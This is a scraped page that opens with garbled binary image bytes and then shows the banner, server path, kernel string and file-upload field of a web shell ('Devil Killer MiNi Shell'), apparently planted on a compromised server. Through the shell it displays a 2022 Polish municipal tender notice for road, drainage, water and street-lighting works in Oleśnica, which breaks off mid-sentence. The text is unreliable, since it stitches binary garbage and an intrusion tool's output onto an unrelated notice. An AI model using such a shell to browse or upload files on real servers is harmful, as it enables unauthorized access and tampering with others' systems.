JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221118/0044742401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa dróg o nawierzchni utwardzonej wraz z infrastrukturą techniczną w ul. Kosynierów, Demokratów i Glinianej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Oleśnica</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934733</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek-Ratusz</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oleśnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@um.olesnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.olesnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa dróg o nawierzchni utwardzonej wraz z infrastrukturą techniczną w ul. Kosynierów, Demokratów i Glinianej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9c981edd-6746-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00447424</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004538/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa drogi wraz z kanalizacją deszczową i oświetleniem w części ul. Kosynierów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania<br/>https://obywatel.gov.pl/nforms/ezamowienia,<br/>kancelaria@um.olesnica.pl, b.strzala@um.olesnica.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Opisano<br/>na stronie: https://miniportal.uzp.gov.pl/Instrukcje oraz https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula RODO zgodnie z załącznikiem nr 8 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula RODO zgodnie z załącznikiem nr 8 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/PN/21/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie zadania pn. „Budowa dróg o nawierzchni utwardzonej wraz z infrastrukturą techniczną w ul. Kosynierów, Demokratów i Glinianej”. Inwestycja dofinansowana jest z Programu Polski Ład.<br/>	Obszar inwestycji położony jest pomiędzy ul. Kosynierów, ul. Glinianą i ul. Wiejską w Oleśnicy. Szczegółowy zakres robót znajduje się w dokumentacji projektowej opracowanej przez firmę DROGTIM Adam Pawłucki z siedzibą przy ul. Spokojnej 14 w Kątnej, na którą uzyskano decyzję ZRID nr 2/2020 z dnia 14.08.2020 r., załączonej do przetargu, a także opisany jest poniżej. <br/>W ramach dokumentacji projektowej został wykonany odcinek kanalizacji sanitarnej w ul. Demokratów od studni S21 do studni S22 i dalej w kierunku studni S32 po terenach prywatnych.<br/>Przed przystąpieniem do prac należy sprawdzić rzędne wysokościowe zarówno istniejącego jak i projektowanego uzbrojenia terenu. Ewentualne różnice i powstałe rozbieżności należy zgłosić Inspektorowi Nadzoru i Zamawiającemu, w celu dokonania ewentualnych korekt przed realizacją robót. Stan istniejącego zagospodarowania terenu można sprawdzić na portalu mapowym na stronie internetowej pod linkiem: https://olesnicki.webewid.pl/e-uslugi/portal-mapowy<br/>W ramach przedmiotu zamówienia Wykonawca ma zrealizować pozostałe roboty budowlane objęte ww. dokumentacją projektową (bez sięgaczy: ul. Wiejskiej, ul. Glinianej i ul. Kosynierów), w tym m.in.: <br/>1)	w obrębie ul. Kosynierów należy wykonać m.in.:<br/>a)	drogę na odcinku od ul. Wiejskiej do ul. Glinianej, o szerokości 5,5 m i długości <br/>ok. 485 m o nawierzchni asfaltowej wraz z połączeniem z istniejącą nawierzchnią w ul. Wiejskiej oraz wyprowadzeniem skrzyżowania z ul. Glinianą, jednostronnym ciągiem pieszo-rowerowym o nawierzchni asfaltowej o szerokości 3,25 m, zjazdy na posesje o nawierzchni asfaltowej (w ciągu pieszo – rowerowym) oraz o nawierzchni z kostki betonowej o kolorze grafitowym, o szerokości dostosowanej do szerokości bram wjazdowych (od 3,5 m do 5 m) i lokalizacji zgodnej z dokumentacją projektową oraz z istniejącymi zjazdami (dodatkowy zjazd na działkę nr 38/2 AM67 o szerokości 5,0 m w lokalizacji zgodnej z załącznikiem graficznym), wyspowe progi zwalniające o nawierzchni asfaltowej oraz zagospodarowanie terenu zielenią niską,<br/>b)	kanalizację deszczową z rur PCV o średnicy 300 mm i długości około 450 m (odcinki D11-D42; D3-D11; D3-D24; D43-D43z) wraz z przykanalikami z rur PCV o średnicy 200 mm do wpustów kanalizacji deszczowej oraz do odwodnień liniowych wzdłuż zjazdów i przyłącza do granicy działek zakończone zaślepkami,<br/>c)	sieć wodociągową w rur PEHD o średnicy 125 mm i długości około 236 m na odcinku od wpięcia w istniejący wodociąg W1 do W3 oraz odcinek W2-W12 wraz z przyłączami o średnicy 32 mm do granicy działek zakończone korkami elektrooporowymi i armaturą zewnętrzną (hydranty, zasuwy, trójniki, itp.). Zamiast przyłącza nr Wp3-Wp3.1 należy wykonać przyłącze o średnicy 32 mm w ul. Kosynierów do granicy działki nr 38/2 AM67 zakończone korkiem elektrooporowym w lokalizacji zgodnej z załącznikiem graficznym. Ponadto do działki nr 6/2 AM68 należy wykonać dodatkowe przyłącze o średnicy 32 mm, zakończone korkiem elektrooporowym w lokalizacji zgodnej z załącznikiem graficznym.<br/>d)	kanalizację sanitarną z rur PCV o średnicy 200 mm o długości około 365 m na odcinku od istniejącej studni S1 do studni S12 oraz odcinek S41-S41z wraz ze wszystkimi przyłączami z rur PCV o średnicy 160 mm do granicy działek zakończone zaślepkami. Ponadto do działki nr 6/2 AM68 należy wykonać dodatkowe przyłącze o średnicy 160 mm, zakończone zaślepką, w lokalizacji zgodnej z załącznikiem graficznym.<br/>e)	kanał technologiczny wraz ze studniami kablowymi i przyłączami do granicy działek,<br/>f)	oświetlenie uliczne typu LED z oznaczeniem numeracji słupów na wysokości 2,5 m od poziomu ulicy poprzez umieszczenie na nich oznaczenia nr słupa/rok wykonania na białym tle wraz z logo miasta. Ponadto słupy należy zabezpieczyć powłoką antyplakatową i antygrafitii do wysokości 2,5 m od poziomu posadowienia słupa. Na skrzyżowaniu ul. Kosynierów z sięgaczem ul. Kosynierów należy przy latarni nr 11/SO-I wykonać uziemienie i pozostawić zapas kabla ok. 2 m pod dalszą rozbudowę oświetlenia,<br/>2)	w obrębie ciągu pieszo-jednego ul. Kosynierów należy wykonać m.in.:<br/>a)	drogę o szerokości 5,0 m o nawierzchni z kostki betonowej i obustronnym poboczem gruntowym obsianym trawą, wraz ze zjazdami na posesję z kostki betonowej o kolorze grafitowym i z kruszywa,<br/>b)	kanalizację deszczową z rur PCV o średnicy 400 mm o długości około 50 m na odcinku od studni D3 do wylotu do rowu Wyl1 wraz z przykanalikami z rur PVC o średnicy 200 mm do wpustów kanalizacji deszczowej oraz do odwodnienia liniowego wzdłuż zjazdu z kostki betonowej na działkę ogródków działkowych,<br/>c)	sieć wodociągową z rur PEHD o średnicy 125 mm i długości około 71 m na odcinku od wpięcia w istniejący wodociąg W9 do W10 wraz armaturą zewnętrzną (hydranty, zasuwy, trójniki, itp.),<br/>d)	oświetlenie uliczne typu LED z oznaczeniem numeracji słupów na wysokości 2,5 m od poziomu ulicy poprzez umieszczenie na nich oznaczenia nr słupa/rok wykonania na białym tle wraz z logo miasta. Ponadto słupy należy zabezpieczyć powłoką antyplakatową i antygrafitii do wysokości 2,5 m od poziomu posadowienia słupa<br/>3)	w obrębie ul. Demokratów należy wykonać m.in.:<br/>a)	drogę o szerokości 5,5 m i długości ok. 230 m o nawierzchni asfaltowej wraz z połączeniem z ul. Kosynierów i z ul. Glinianą, jednostronnym chodnikiem z kostki betonowej szarej gr. 8 cm o szerokości 2,25 m wraz ze zjazdami na posesję z kostki betonowej o kolorze grafitowym, gr. 8 cm o szerokości dostosowanej do szerokości bram wjazdowych (od 3,5 m do 5 m) i lokalizacji zgodnej z dokumentacją projektową oraz z istniejącymi zjazdami, z progami zwalniającymi i zagospodarowaniem terenu zielenią niską,<br/>b)	kanalizację deszczową z rur PCV o średnicy 300 mm o długości około 207 m na odcinku od studni D11 do studni D18 wraz z przykanalikami z rur PCV o średnicy 200 mm do wpustów kanalizacji deszczowej oraz do odwodnień liniowych wzdłuż zjazdów i przyłącza do granicy działek zakończone zaślepkami,<br/>c)	sieć wodociągową z rur PEHD o średnicy 125 mm i długości około 155 m na odcinku od wpięcia w istniejący wodociąg W4 do W5 wraz ze wszystkimi przyłączami w obrębie ul. Demokratów o średnicy 32 mm do granicy działek zakończone korkami elektrooporowymi i armaturą zewnętrzną (hydranty, zasuwy, trójniki, itp.), <br/>d)	kanalizację sanitarną z rur PCV o średnicy 200 mm o długości około 212 m na odcinku od istniejącej studni S22 do studni S28 wraz ze wszystkimi przyłączami z rur PCV o średnicy 160 mm do granicy działek zakończone zaślepkami,<br/>e)	kanał technologiczny wraz ze studniami kablowymi i przyłączami do granicy działek zakończonymi zaślepkami,<br/>f)	oświetlenie uliczne typu LED z oznaczeniem numeracji słupów na wysokości 2,5 m od poziomu ulicy poprzez umieszczenie na nich oznaczenia nr słupa/rok wykonania na białym tle wraz z logo miasta. Ponadto słupy należy zabezpieczyć powłoką antyplakatową i antygrafitii do wysokości 2,5 m od poziomu posadowienia słupa. Na skrzyżowaniu ul. Demokratów i ul. Glinianej należy do wybudowanej szafki oświetleniowej włączyć całe oświetlenie z terenu inwestycji zgodnie z dokumentacją projektową firmy DROGTIM,<br/>4)	w obrębie ul. Glinianej należy wykonać m.in.:<br/>a)	drogę o szerokości 5,5 m i długości ok. 275 m o nawierzchni asfaltowej z połączeniem z ul. Kosynierów, ul. Demokratów, ul. Wiejską i wyprowadzeniem skrzyżowania w sięgacz ul. Glinianej i pod przyszłą drogę ujętą w mpzp, wraz ze zjazdami na posesję z kostki betonowej o kolorze grafitowym, gr. 8 cm o szerokości dostosowanej do szerokości bram wjazdowych (od 3,5 m do 5 m) i lokalizacji zgodnej z dokumentacją projektową oraz z istniejącymi zjazdami, jednostronnym chodnikiem o szerokości 2,25 m z kostki betonowej gr. 8 cm koloru szarego, wyspowe progi zwalniające i zagospodarowaniem terenu zielenią niską,<br/>b)	kanalizację deszczową z rur PVC o średnicy 300 mm o długości około 257 m (odcinki D24-D34; D29-D36; D33-D39) wraz z przykanalikami z rur PVC o średnicy 200 mm do wpustów deszczowych i przyłączami do granicy działek zakończone zaślepkami. Studnie D36 i D39 należy wykonać z odejściami pod dalszą rozbudowę kanalizacji zgodnie z dokumentacją projektową , zaślepione zaślepkami),<br/>c)	sieć wodociągowa w rur PEHD o średnicy 125 mm i długości około 55 m na odcinku od wpięcia w istniejący wodociąg W8 do W6 wraz z przyłączami Wp21-Wp21.1 i Wp25-Wp25.1. Ponadto do działki nr 6/2 AM68 należy wykonać dodatkowe przyłącze o średnicy 32 mm, zakończone korkiem elektrooporowym w lokalizacji zgodnej z załącznikiem graficznym,<br/>d)	kanalizację sanitarną z rur PCV o średnicy 200 mm o długości około 150 m na odcinku od studni S12 do studni S18 oraz odcinek od studni S28 do studni S30 wraz ze wszystkimi przyłączami z rur PCV o średnicy 160 mm do granicy działek zakończone zaślepkami. Ponadto do działki nr 7/2 AM68 należy wykonać dodatkowe przyłącze o średnicy 160 mm, zakończone zaślepką, w lokalizacji zgodnej z załącznikiem graficznym,<br/>e)	kanał technologiczny wraz ze studniami kablowymi i przyłączami do granicy działek zakończonymi zaślepkami. Studnię 15/SKO-2g na skrzyżowaniu z sięgaczem ul. Glinianej wykonać zgodnie z dokumentacją projektową z zaślepką na odejściu w stronę sięgacza, <br/>f)	oświetlenie uliczne typu LED w ul. Glinianej wraz z latarnią nr 6/SO-II z uziemieniem i zapasem kabla ok. 2 m pod dalszą rozbudowę, z oznaczeniem numeracji słupów na wysokości 2,5 m od poziomu ulicy poprzez umieszczenie na nich oznaczenia nr słupa/rok wykonania na białym tle wraz z logo miasta. Ponadto słupy należy zabezpieczyć powłoką antyplakatową i antygrafitii do wysokości 2,5 m od poziomu posadowienia słupa, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium ceny oraz kryteria jakościowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1.	nie podlegają wykluczeniu, zgodnie z rozdz. XI SIWZ<br/>2.	spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/><br/>Warunki udziału w postępowaniu, opis sposobu dokonywania oceny spełniania tych warunków<br/>3.	Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia w tym zakresie warunku<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia w tym zakresie warunku<br/>3) sytuacji ekonomicznej lub finansowej: Wykonawca spełni warunek, jeżeli wykaże, że jest ubezpieczony w zakresie odpowiedzialności cywilnej na kwotę min. 1 mln PLN<br/>4)	zdolności technicznej lub zawodowej: <br/>a)	Wykonawca spełni warunek, jeżeli wykaże się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie: <br/>- 5 tys. m2 nawierzchni utwardzonej wykonane w ramach maksymalnie 3 zamówień<br/> - sieć kanalizacji grawitacyjnej o łącznej długości min. 1500 m i fi min. 200mm, wykonane w ramach maksymalnie 3 zamówień<br/>- sieć wodociągową o dł. min 500m i fi. min. 110, wykonane w ramach maksymalnie 3 zamówień<br/>- linię kablową oświetlenia o dł. min. 500m i 20 szt. latarni ulicznych lub parkowych, wykonane w ramach maksymalnie 3 zamówień<br/>b)	Wykonawca spełni warunek, jeżeli wykaże się dysponowaniem oraz podstawę do dysponowania: <br/>- kierownik budowy z uprawnieniami z uprawnieniami drogowymi – bez ograniczeń<br/>- kierownik robót z uprawnieniami z uprawnieniami sanitarnymi w zakresie sieci i instalacji – bez ograniczeń<br/>- kierownik robót z uprawnieniami elektrycznymi w zakresie sieci i instalacji – bez ograniczeń<br/>c)	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej dopuszcza łączne spełnianie warunków przez Wykonawców.<br/>5)	Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia<br/>6)	Zgodnie z art. 118 pzp, wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu:<br/>a)	Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – według załącznika nr 7 do SWZ;<br/>b)	Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2)	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu określonych w rozdz. XII SWZ:<br/>a)	dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>b)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których 